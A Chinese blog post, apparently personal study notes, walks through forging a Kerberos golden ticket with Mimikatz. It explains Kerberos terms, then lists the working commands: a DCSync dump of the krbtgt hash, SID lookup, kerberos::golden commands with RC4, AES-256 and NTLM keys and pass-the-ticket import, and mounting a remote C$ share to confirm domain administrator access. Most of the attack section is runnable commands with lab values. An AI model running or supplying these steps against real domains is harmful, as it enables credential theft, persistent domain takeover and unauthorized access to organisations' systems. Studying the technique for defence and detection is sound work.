Mimikatz 黄金票据伪造&传递攻击

Mimikatz 黄金票据伪造&传递攻击

01 攻击说明

1.1 票据传递攻击(Pass the Ticket,PtT)

票据传递攻击(PtT)是基于Kerberos认证的一种攻击方法,常用来做后渗透权限维持,黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM哈希或者AES-256的值,白银票据攻击利用的前提是得到了域内服务账号的NTLM哈希或者AES-256的值,票据传递攻击用来做域控权限维持。

1.1 什么是Krbtgt用户

每个域控制器都有一个krbtgt的用户账户,是KDC的服务的账户,用来创建票据授予服务(TGS)加密的密钥kerberos是一种网络认证协议,其设计是通过密钥系统为客户机/服务器应用程序 提供强大的认证服务。

1.2 关键字说明

  1. kerberos认证
  2. 域控制器(Domain Controller,DC)
  3. 密钥分发中心(Key Distribution Center,KDC)
  4. 账户数据库(Account Database,AD) :类似于SAM数据库,存储所有Client的白名单,只有处于白名单中的Client才可以成功申请TGT
  5. 身份验证服务(Authentication Service,AS) :为Client生成TGT服务
  6. 入场卷​**认证票据**:为Client生成某个服务的票据
  7. 票据(Ticket) :票据,网络对象互相访问的凭证
  8. Master Key/Long-term Key|长期密钥(被Hash加密的用户密钥) :长期密钥,将本机密码进行Hash运算(NTML得到一个Hash Code)我们一般管这样的Hash Code叫做Master Key
  9. Session Key/Short-term Key|短期会话密钥:短期会话密钥,一种只在一段事件内有效的Key
  10. krbtgt账户:每个域控制器都有一个kebtgt的用户账户,是KDC的服务账户,用来创建票据赋予服务(TGS)加密的密钥

02 黄金票据(Golden Ticket)伪造&传递攻击

在认证过程中,客户端于KAS的通信会得到TGT认购权证,带着TGT认购权向TGS请求,得到ST服务票据,用这个ST服务票据可以来访问应用服务器,域中每个用户的ST服务票据都是由krbtgt用户的密码Hash来计算生曾的,因此只要我们拿到了krbtgt用户hash生成的票据被称为Golden Ticket,此类攻击方法被称作票据传递攻击PTT

2.1 必要知道的信息

1
2
3
4
1. 要伪造的域用户(这里我们一般填写域管理员账户)
2. 域名
3. 域的SID值(域成员SID值去掉最后的)
4. krbtgt账号的哈希值或者AES-256

2.2 Mimikatz Kerberos Module

Mimikatz的Kerberos模块中常见大概为:列出当前的所有票据(当前用户所在session,效果等同于命令

序号 类型 命令
1 查看伪造票据 kerberos::list klist
2 黄金票据 kerberos::golden
3 白银票据 kerberos::ptt 
1
2
3
4
5
6
7
8
9
kerberos::list
kerberos::tgt
# 列出系统中的票据

kerberos::purge
# 清除系统中的票据

kerberos::ptc 票据路径
# 导入票据到系统中

2.3 开始伪造凭据

2.3.1 查看域名称

1
net config workstation

image

2.3.2 查看krbtgt​用户Hash NTLM

1
2
privilege::debug
lsadump::dcsync /domain:hesc.info /user:krbtgt

1748364450052

image

2.3.3 查看当前登录的域账号sid

1
2
whoami /user
S-1-5-21-2625511082-1873447012-2633140851-1174

image

主要我们需要的SID值所以我们要去掉最后的1174。

如下SID为S-1-5-21-2625511082-1873447012-2633140851-1174

2.3.4 伪造黄金票据并导入

以下环境是在域成员A的Administrator​用户下进行,因为mimikatz​需要管理员权限,生成票据并导入:

1
2
3
4
5
6
7
8
9
10
11
12
privilege::debug # 提权
# kerberos::golden /user:要伪造的域用户<一般写域管理员> /domain:域名 /sid:域账号的sid值 /krbtgt:krbtgt的哈希 /ptt
kerberos::golden /user:administrator /domain:hesc.info /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ptt # 生成票据并导入

方法二:使用krbtgtAES-256
privilage::debug # 提权
kerberos::golden /user:要伪造的域用户<一般写域管理员>/domain:域名 /sid:域账号的sid值 /aes256:krbtgt的哈希 /ptt
kerberos::golden /user:administrator /domain:hesc.info /sid:S-1-5-21-2952760202-1353902439-2381784089 /aes256:a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2 /ptt

方法三:使用krbtgtRC4
kerberos::golden /user:要伪造的域用户<一般写域管理员>/domain:域名 /sid:域账号的sid值 /rc4:krbtgt的哈希 /ptt
kerberos::golden /user:hack /domain:hesc.info /sid:S-1-5-21-2625511082-1873447012-2633140851 /rc4:ebc835a89ed0324e7d7566a550a350fb /ptt

使用第三种方式伪造黄金票据

image

2.3.5 查看生成的票据信息

1
kerberos::list

image

2.3.6 验证票据

1
2
net use k: \\DESKTOP-TSBH49T.hesc.info\c$
# 将主机名DESKTOP-TSBH49T的C盘映射到本地的K盘,注意这里格式只能是 主机名 域名的形式,而不能写IP<其实写IP地址也可以>

image

#日常笔记 #Windows #安全渗透 #SIEM
Mimikatz 黄金票据伪造&传递攻击
https://hesc.info/post/mimikatz-gold-note-forgery-passing-attack-8ccoy.html
作者
需要哈气的纸飞机
发布于
2025年5月28日
许可协议